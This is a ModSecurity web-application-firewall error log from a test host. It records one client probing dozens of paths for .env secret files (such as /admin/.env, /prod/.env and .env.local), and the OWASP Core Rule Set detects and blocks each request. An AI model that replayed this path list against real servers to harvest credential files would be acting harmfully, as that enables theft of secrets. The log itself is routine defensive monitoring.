[Wed Feb 18 18:17:30.231789 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nnAAAAAA"]
[Wed Feb 18 18:17:30.342624 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nnQAAAAA"]
[Wed Feb 18 18:17:30.342888 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nnQAAAAA"]
[Wed Feb 18 18:17:30.343077 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nnQAAAAA"]
[Wed Feb 18 18:17:30.950469 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nngAAAAA"]
[Wed Feb 18 18:17:30.950702 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nngAAAAA"]
[Wed Feb 18 18:17:30.950909 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nngAAAAA"]
[Wed Feb 18 18:17:43.566200 2026] [:error] [pid 2167596] [client 195.178.110.34:57372] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZX0NwNfOk4fQtXkBoshbAAAAAk"]
[Wed Feb 18 18:17:43.566476 2026] [:error] [pid 2167596] [client 195.178.110.34:57372] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZX0NwNfOk4fQtXkBoshbAAAAAk"]
[Wed Feb 18 18:17:43.566658 2026] [:error] [pid 2167596] [client 195.178.110.34:57372] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZX0NwNfOk4fQtXkBoshbAAAAAk"]
[Wed Feb 18 18:17:47.873811 2026] [:error] [pid 2161842] [client 195.178.110.34:57376] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aZX0Ox7i3MGSJhlZ2JDhCwAAAAY"]
[Wed Feb 18 18:17:47.874042 2026] [:error] [pid 2161842] [client 195.178.110.34:57376] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aZX0Ox7i3MGSJhlZ2JDhCwAAAAY"]
[Wed Feb 18 18:17:47.874230 2026] [:error] [pid 2161842] [client 195.178.110.34:57376] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aZX0Ox7i3MGSJhlZ2JDhCwAAAAY"]
[Wed Feb 18 18:17:47.960246 2026] [:error] [pid 2161842] [client 195.178.110.34:57376] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aZX0Ox7i3MGSJhlZ2JDhDAAAAAY"]
[Wed Feb 18 18:17:47.960494 2026] [:error] [pid 2161842] [client 195.178.110.34:57376] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aZX0Ox7i3MGSJhlZ2JDhDAAAAAY"]
[Wed Feb 18 18:17:47.960694 2026] [:error] [pid 2161842] [client 195.178.110.34:57376] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aZX0Ox7i3MGSJhlZ2JDhDAAAAAY"]
[Wed Feb 18 18:17:48.019289 2026] [authz_core:error] [pid 2161842] [client 195.178.110.34:57376] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Wed Feb 18 18:17:48.390430 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5RgAAAA4"]
[Wed Feb 18 18:17:48.390671 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5RgAAAA4"]
[Wed Feb 18 18:17:48.390860 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5RgAAAA4"]
[Wed Feb 18 18:17:48.440965 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5RwAAAA4"]
[Wed Feb 18 18:17:48.441193 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5RwAAAA4"]
[Wed Feb 18 18:17:48.441599 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5RwAAAA4"]
[Wed Feb 18 18:17:48.492354 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SAAAAA4"]
[Wed Feb 18 18:17:48.492605 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SAAAAA4"]
[Wed Feb 18 18:17:48.492803 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SAAAAA4"]
[Wed Feb 18 18:17:48.552079 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SQAAAA4"]
[Wed Feb 18 18:17:48.552312 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SQAAAA4"]
[Wed Feb 18 18:17:48.552542 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SQAAAA4"]
[Wed Feb 18 18:17:48.604855 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SgAAAA4"]
[Wed Feb 18 18:17:48.605083 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SgAAAA4"]
[Wed Feb 18 18:17:48.605270 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aZX0PLL5cjoaqbNB75y5SgAAAA4"]
[Wed Feb 18 18:17:48.866300 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aZX0PLL5cjoaqbNB75y5TQAAAA4"]
[Wed Feb 18 18:17:48.866552 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aZX0PLL5cjoaqbNB75y5TQAAAA4"]
[Wed Feb 18 18:17:48.866734 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aZX0PLL5cjoaqbNB75y5TQAAAA4"]
[Wed Feb 18 18:17:48.930207 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aZX0PLL5cjoaqbNB75y5TgAAAA4"]
[Wed Feb 18 18:17:48.930508 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aZX0PLL5cjoaqbNB75y5TgAAAA4"]
[Wed Feb 18 18:17:48.930704 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aZX0PLL5cjoaqbNB75y5TgAAAA4"]
[Wed Feb 18 18:17:49.003460 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aZX0PbL5cjoaqbNB75y5TwAAAA4"]
[Wed Feb 18 18:17:49.003716 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aZX0PbL5cjoaqbNB75y5TwAAAA4"]
[Wed Feb 18 18:17:49.003915 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aZX0PbL5cjoaqbNB75y5TwAAAA4"]
